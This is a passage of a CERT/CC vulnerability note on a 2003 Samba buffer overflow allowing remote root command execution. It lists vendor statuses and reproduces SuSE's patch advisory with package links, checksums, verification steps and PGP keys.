\n\\------oOo------ \n \nSGI provides a comprehensive customer World Wide Web site. This site is \nlocated at <http://www.sgi.com/support/security/> . \n \n\\------oOo------ \n \nIf there are general security questions on SGI systems, email can be sent to \nsecurity-info@sgi.com. \n \nFor reporting *NEW* SGI security issues, email can be sent to \nsecurity-alert@sgi.com or contact your SGI support provider. A support \ncontract is not required for submitting a security report. \n \n______________________________________________________________________________ \nThis information is provided freely to all interested parties \nand may be redistributed provided that it is not altered in any \nway, SGI is appropriately credited and the document retains and \nincludes its valid PGP signature. \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.2 \n \niQCVAwUBPnjRVbQ4cFApAP75AQEOYAP+JXQz1lctJ+e+qw79i/Xq/yYDXbO0QiF8 \nrPRiMiRBdzdM6AftmrafxtYlZBA6zAIpOKREdXmIqX0ugCRynwGke0EiC/p5IfLi \nGMZoztzO78zk03n4rrAbWqFCBoxzcJOEo9dnuFVIxosx1zJB2LpXrfytZieLJpLh \nt1m/MAoQn18= \n=wxEX \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ Samba Team\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see the security announcement posted on <http://www.samba.org/samba/whatsnew/samba-2.2.8.html>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ SuSE Inc.\n\nUpdated: March 19, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`______________________________________________________________________________ \n` \n` SuSE Security Announcement \n` \n` Package: samba, samba-client \nAnnouncement-ID: SuSE-SA:2003:016 \nDate: Wednesday, March 19th 12:00 MET \nAffected products: 7.1, 7.2, 7.3, 8.0, 8.1 \nSuSE Linux Database Server \nSuSE eMail Server 3.1 \nSuSE eMail Server III \nSuSE Firewall Adminhost VPN \nSuSE Linux Admin-CD for Firewall \nSuSE Firewall on CD 2 - VPN \nSuSE Firewall on CD 2 \nSuSE Linux Enterprise Server for S/390 \nSuSE Linux Connectivity Server \nSuSE Linux Enterprise Server 7 \nSuSE Linux Enterprise Server 8 \nSuSE Linux Office Server \nVulnerability Type: remote command execution \nSeverity (1-10): 7 \nSuSE default package: No \nCross References: ``<http://www.samba.org>`` \nCAN-2003-0085 \nCAN-2003-0086 \n` \n` Content of this advisory: \n1) security vulnerability resolved: buffer overflows and a chown \nrace condition in the smbd server, buffer overflow in the samba \nclient \nproblem description, discussion, solution and upgrade information \n2) pending vulnerabilities, solutions, workarounds: \n- wget \n3) standard appendix (further information) \n` \n`______________________________________________________________________________ \n` \n`1) problem description, brief discussion, solution, upgrade information \n` \n \n` Sebastian Krahmer, SuSE Security Team, reviewed security-critical \nparts of the Samba server within the scope of security audits that \nthe SuSE Security Team conducts on a regular basis for security-critical \nOpen Source Software. \nBuffer overflows and a chown race condition have been discovered and \nfixed during the security audit. The buffer overflow vulnerabilitiy \nallows a remote attacker to execute arbitrary commands as root on the \nsystem running samba. In addition to the flaws fixed in the samba \nserver, some overflow conditions in the samba-client package have \nbeen fixed with the available update packages. It is strongly \nrecommended to install the update packages on a system where the \nsamba package is used. \n` \n` There exists no temporary workaround against this vulnerability other \nthan shutting down the smbd daemon. \n` \n` We would like to thank the Samba Team, especially Jeremy Allison, Andrew \nBartlett and Volker Lendecke for their quick response and cooperation. \n` \n` Please note that the package names for SuSE products vary for different \nproducts. There exist the following pairings: \nserver client \n---------------------------- \nsamba smbclnt \nsamba samba-client \nsamba-classic samba-classic-client \nsamba-ldap samba-ldap-client \n` \n` To find out which packages are installed on your system, you may run \nthe following command: \n` \n` rpm -qa|egrep '(samba|smbclnt)' \n` \n` Please download the update package for your distribution and verify its \nintegrity by the methods listed in section 3) of this announcement. \nThen, install the package using the command \"rpm -Fhv file.rpm\" to apply \nthe update. \nOur maintenance customers are being notified individually. The packages \nare being offered to install from the maintenance web. \n` \n` SPECIAL INSTALL INSTRUCTIONS: \n============================== \nAfter successfully installing the update packages, you should restart \nthe samba server process(es) to make the changes in the system effective. \nIf you do not have a samba server running on your system, no further \naction is required. If you have a samba server running, please run the \nfollowing command as root: \n` \n` rcsmb restart \n` \n \n` Intel i386 Platform: \n` \n` SuSE-8.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-2.2.5-160.i586.rpm>`` \ndeae19fe6dc1fd519c9219e791983128 \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-client-2.2.5-160.i586.rpm>`` \ndac659a9c774ed1e0f8cea04e5b287ee \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-2.2.5-160.i586.patch.rpm>`` \n1fdedee145fd35ad30ef078182bfcdeb \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/samba-client-2.2.5-160.i586.patch.rpm>`` \n7bf4707c05c477db610f2a79b48b51a5 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/samba-2.2.5-160.src.rpm>`` \nf62e0b9ffb00058ec4be67746903a4cc \n` \n` SuSE-8.0: \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/samba-2.2.3a-169.i386.rpm>`` \n519550b7d4a52f63ca858f1f58c283aa \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/samba-client-2.2.3a-169.i386.rpm>`` \ndaeb00edf26acfcbad92bae602689d42 \npatch rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/samba-2.2.3a-169.i386.patch.rpm>`` \nfaf4c352d880b1f1be4baa3e8079243f \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/samba-client-2.2.3a-169.i386.patch.rpm>`` \n7bbcc81d79bebff8103c37f8cb8565dc \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/samba-2.2.3a-169.src.rpm>`` \ndaf838ccb337ca0863c65a9439e7ef7a \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n2/samba-2.2.1a-213.i386.rpm>`` \n368e2d0190b4520965a79bf836eaaa2d \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/samba-client-2.2.1a-213.i386.rpm>`` \n06070925fd5cb40bc3f2985a5d64eff1 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/samba-2.2.1a-213.src.rpm>`` \naf94d5ba0977e69de416fef54980a04d \n` \n` SuSE-7.2: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n2/samba-2.2.0a-48.i386.rpm>`` \n6300d1278311145e69522d58bde5aaf8 \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/smbclnt-2.2.0a-48.i386.rpm>`` \n2553481e90b85a616c25580eb2875ea4 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/samba-2.2.0a-48.src.rpm>`` \n0d7397de281f100163fa105c972b387d \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/n2/samba-2.0.10-27.i386.rpm>`` \n1eb26f1ef80681ec479a9028d51647bf \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/smbclnt-2.0.10-27.i386.rpm>`` \nfa2a4d306536dd90a31677487996f2e0 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/samba-2.0.10-27.src.rpm>`` \n1cd317f5749de96e432fee19310ea6f6 \n` \n \n \n` Sparc Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n2/samba-2.2.1a-73.sparc.rpm>`` \n9e140d7fe66015dfbb7f9b9edce5f91e \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/samba-client-2.2.1a-73.sparc.rpm>`` \n632d72c89565cc90be8e02b50d3cdb9a \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/samba-2.2.1a-73.src.rpm>`` \neea5157ce34ff8cb959ed46c144dd96f \n` \n \n \n \n` AXP Alpha Platform: \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/n2/samba-2.0.10-21.alpha.rpm>`` \n046c7de92587d7a1c30d915b72e176bc \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/smbclnt-2.0.10-21.alpha.rpm>`` \n12e9b05050a1610ba03f5338c6f92b82 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/samba-2.0.10-21.src.rpm>`` \n79359cbca70ec1fb8a425e5b9a7eb00c \n` \n \n \n` PPC Power PC Platform: \n` \n` SuSE-7.3: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n2/samba-2.2.1a-147.ppc.rpm>`` \nbd367591e2df9061baa618d6a78c84b1 \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/n1/samba-client-2.2.1a-147.ppc.rpm>`` \nb05f69057a35abde3e2c19aa456f8467 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/samba-2.2.1a-147.src.rpm>`` \nd990a6b247a6a38eaaeaef06f71269ea \n` \n` SuSE-7.1: \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n2/samba-2.0.10-21.ppc.rpm>`` \n5dc1f1d9337a5241cb35e7179e8fb28b \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/n1/smbclnt-2.0.10-21.ppc.rpm>`` \n76263c619a4d05ef4f4de4f9813a0a72 \nsource rpm(s): \n``<ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/samba-2.0.10-21.src.rpm>`` \nbe112406b4fff2b5e4a08a67a2411919 \n` \n \n`______________________________________________________________________________ \n` \n`2) Pending vulnerabilities in SuSE Distributions and Workarounds: \n` \n` - wget \nNew wget packages are available which filter certain characters \nsuch as .. and / in filenames to ensure evil servers cannot overwrite \nimportant system-files or files outside the current directory. \n` \n \n`______________________________________________________________________________ \n` \n`3) standard appendix: authenticity verification, additional information \n` \n` - Package authenticity verification: \n` \n` SuSE update packages are available on many mirror ftp servers all over \nthe world. While this service is being considered valuable and important \nto the free and open source software community, many users wish to be \nsure about the origin of the package and its content before installing \nthe package. There are two verification methods that can be used \nindependently from each other to prove the authenticity of a downloaded \nfile or rpm package: \n1) md5sums as provided in the (cryptographically signed) announcement. \n2) using the internal gpg signatures of the rpm package. \n` \n` 1) execute the command \nmd5sum <name-of-the-file.rpm> \nafter you downloaded the file from a SuSE ftp server or its mirrors. \nThen, compare the resulting md5sum with the one that is listed in the \nannouncement. Since the announcement containing the checksums is \ncryptographically signed (usually using the key security@suse.de), \nthe checksums show proof of the authenticity of the package. \nWe disrecommend to subscribe to security lists which cause the \nemail message containing the announcement to be modified so that \nthe signature does not match after transport through the mailing \nlist software. \nDownsides: You must be able to verify the authenticity of the \nannouncement in the first place. If RPM packages are being rebuilt \nand a new version of a package is published on the ftp server, all \nmd5 sums for the files are useless. \n` \n` 2) rpm package signatures provide an easy way to verify the authenticity \nof an rpm package. Use the command \nrpm -v --checksig <file.rpm> \nto verify the signature of the package, where <file.rpm> is the \nfilename of the rpm package that you have downloaded. Of course, \npackage authenticity verification can only target an un-installed rpm \npackage file. \nPrerequisites: \na) gpg is installed \nb) The package is signed using a certain key. The public part of this \nkey must be installed by the gpg program in the directory \n~/.gnupg/ under the user's home directory who performs the \nsignature verification (usually root). You can import the key \nthat is used by SuSE in rpm packages for SuSE Linux by saving \nthis announcement to a file (\"announcement.txt\") and \nrunning the command (do \"su -\" to be root): \ngpg --batch; gpg < announcement.txt | gpg --import \nSuSE Linux distributions version 7.1 and thereafter install the \nkey \"build@suse.de\" upon installation or upgrade, provided that \nthe package gpg is installed. The file containing the public key \nis placed at the top-level directory of the first CD (pubring.gpg) \nand at ``<ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de>`` . \n` \n \n` - SuSE runs two security mailing lists to which any interested party may \nsubscribe: \n` \n` suse-security@suse.com \n- general/linux/SuSE security discussion. \nAll SuSE security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-subscribe@suse.com>. \n` \n` suse-security-announce@suse.com \n- SuSE's announce-only mailing list. \nOnly SuSE's security announcements are sent to this list. \nTo subscribe, send an email to \n<suse-security-announce-subscribe@suse.com>. \n` \n` For general information or the frequently asked questions (faq) \nsend mail to: \n<suse-security-info@suse.com> or \n<suse-security-faq@suse.com> respectively. \n` \n` ===================================================================== \nSuSE's security contact is <security@suse.com> or <security@suse.de>. \nThe <security@suse.de> public key is listed below. \n===================================================================== \n______________________________________________________________________________ \n` \n` The information in this advisory may be distributed or reproduced, \nprovided that the advisory is not modified in any way. In particular, \nit is desired that the clear-text signature shows proof of the \nauthenticity of the text. \nSuSE Linux AG makes no warranties of any kind whatsoever with respect \nto the information contained in this security advisory. \n` \n`Type Bits/KeyID Date User ID \npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de> \npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de> \n` \n`- -----BEGIN PGP PUBLIC KEY BLOCK----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`mQGiBDnu9IERBACT8Y35+2vv4MGVKiLEMOl9GdST6MCkYS3yEKeueNWc+z/0Kvff \n4JctBsgs47tjmiI9sl0eHjm3gTR8rItXMN6sJEUHWzDP+Y0PFPboMvKx0FXl/A0d \nM+HFrruCgBlWt6FA+okRySQiliuI5phwqkXefl9AhkwR8xocQSVCFxcwvwCglVcO \nQliHu8jwRQHxlRE0tkwQQI0D+wfQwKdvhDplxHJ5nf7U8c/yE/vdvpN6lF0tmFrK \nXBUX+K7u4ifrZlQvj/81M4INjtXreqDiJtr99Rs6xa0ScZqITuZC4CWxJa9GynBE \nD3+D2t1V/f8l0smsuYoFOF7Ib49IkTdbtwAThlZp8bEhELBeGaPdNCcmfZ66rKUd \nG5sRA/9ovnc1krSQF2+sqB9/o7w5/q2qiyzwOSTnkjtBUVKn4zLUOf6aeBAoV6NM \nCC3Kj9aZHfA+ND0ehPaVGJgjaVNFhPi4x0e7BULdvgOoAqajLfvkURHAeSsxXIoE \nmyW/xC1sBbDkDUIBSx5oej73XCZgnj/inphRqGpsb+1nKFvF+rQoU3VTRSBQYWNr \nYWdlIFNpZ25pbmcgS2V5IDxidWlsZEBzdXNlLmRlPohcBBMRAgAcBQI57vSBBQkD \nwmcABAsKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyl8sAJ98BgD40zw0GHJHIf6d \nNfnwI2PAsgCgjH1+PnYEl7TFjtZsqhezX7vZvYCIRgQQEQIABgUCOnBeUgAKCRCe \nQOMQAAqrpNzOAKCL512FZvv4VZx94TpbA9lxyoAejACeOO1HIbActAevk5MUBhNe \nLZa/qM2JARUDBRA6cGBvd7LmAD0l09kBATWnB/9An5vfiUUE1VQnt+T/EYklES3t \nXXaJJp9pHMa4fzFa8jPVtv5UBHGee3XoUNDVwM2OgSEISZxbzdXGnqIlcT08TzBU \nD9i579uifklLsnr35SJDZ6ram51/CWOnnaVhUzneOA9gTPSr+/fT3WeVnwJiQCQ3 \n0kNLWVXWATMnsnT486eAOlT6UNBPYQLpUprF5Yryk23pQUPAgJENDEqeU6iIO9Ot \n1ZPtB0lniw+/xCi13D360o1tZDYOp0hHHJN3D3EN8C1yPqZd5CvvznYvB6bWBIpW \ncRgdn2DUVMmpU661jwqGlRz1F84JG/xe4jGuzgpJt9IXSzyohEJB6XG5+D0BiF0E` \n`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 \nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= \n=LRKC \n- -----END PGP PUBLIC KEY BLOCK----- \n` \n \n`-----BEGIN PGP SIGNATURE----- \nVersion: 2.6.3in \nCharset: noconv \n` \n`iQEVAwUBPnhbdney5gA9JdPZAQEg0Qf/RwgWovGbyFz4GzXPsgA3B7VANC97cSw0 \nuEj0YueZRQ5PjZyLS4EzkWdyqoHJ65A3Y1XwIpIAfeO2OAxwOLhBK8tc00LtQl/X \nNk6QIu1KRD71KbnOViPaJMwg+3VrB6OmSyI1OKVnp+uTcWwdmK1JmZdwUd84ZKjX \n7QDOabaNi9hRRUr4dorN0Pqa3X27NgNamdDH/WOV60D6qvL/EVxHwH12GMaFwtmK \npiMVriZD8+ltgz0IfVeAav3TdMRnxZHaq4lLc69X4Zd0TsTfO4SULzgqZpq4nK4t \nxkcBl4ijfqPIIy10t+Vk+CnVqCS0dhPJRCVxCNJjfYcEjHurqEz2ng== \n=BKe1 \n-----END PGP SIGNATURE----- \n`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nUpdated: May 15, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSun includes a version of Samba with Solaris 9 which is affected by this issue. Sun provides Samba on the Solaris Companion CD for Solaris 2.6, 7, and 8:\n\n \n<http://wwws.sun.com/software/solaris/freeware/index.html> \nas an unsupported package which installs to /opt/sfw and is vulnerable to this issue too. Sites using the freeware version of Samba from the Solaris Companion CD will have to upgrade to a later version from Samba.org. Sun has published Sun Alert 53581 for this issue describing the workaround options here: \n\n\n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/53581> \nThe Sun Alert will be updated with the patch information as soon as it becomes available. \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Fujitsu\n\nUpdated: March 25, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. is not affected by the problem in VU#298233 because it does not support the Samba.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Ingrian Networks\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIngrian Networks products don't include Samba, so they would not be affected by this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Openwall GNU/*/Linux\n\nUpdated: March 19, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nWe don't re-distribute Samba.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ SGI\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nSGI acknowledges receiving CERT VU#298233 and is currently investigating. This is being tracked as SGI Bug# 883509. No further information is available at this time.\n\nFor the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported SGI operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list on <http://www.sgi.com/support/security/>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\nView all 19 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.samba.org/samba/whatsnew/samba-2.2.8.html>\n * <http://www.securityfocus.com/bid/7106>\n\n### Acknowledgements\n\nThanks to Sebastian Krahmer for reporting this vulnerability.\n\nThis document was written by Jason A Rafail.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0085](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0085>) \n---|--- \n**Severity Metric:****** | 23.63 \n**Date Public:** | 2003-03-16 \n**Date First Published:** | 2003-03-17 \n**Date Last Updated: ** | 2003-05-15 16:54 UTC \n**Document Revision: ** | 8 \n", "modified": "2003-05-15T16:54:00", "published": "2003-03-17T00:00:00", "id": "VU:298233", "href": "https://www.kb.cert.org/vuls/id/298233", "type": "cert", "title": "Samba contains buffer overflow in SMB/CIFS packet fragment reassembly code", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}